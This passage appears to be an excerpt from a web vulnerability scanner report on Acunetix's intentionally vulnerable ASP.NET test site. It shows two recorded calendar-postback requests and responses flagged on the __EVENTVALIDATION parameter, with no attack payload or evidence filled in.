Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8381&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAD3z9Pb2ghkZGTaqWOCglSkyfA2Wn%2BWymOBLQHgmA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpw4aTAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGIfhQOJGoVoCT4y3%2BtAGB%2FEU02S
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:49 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAD3z9Pb2ghkZGTaqWOCglSkyfA2Wn+WymOBLQHgmA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpw4aTAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGIfhQOJGoVoCT4y3+tAGB/EU02S" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:White" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8190&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAECu9RdoIZGRkSsDs3%2FHqy544BhEozh5V7eTFdyI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpxcvaBQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9uLSNdOLUtJxRDs24sKpvnaNwraQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:35 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAECu9RdoIZGRkSsDs3/Hqy544BhEozh5V7eTFdyI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpxcvaBQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9uLSNdOLUtJxRDs24sKpvnaNwraQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:White" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
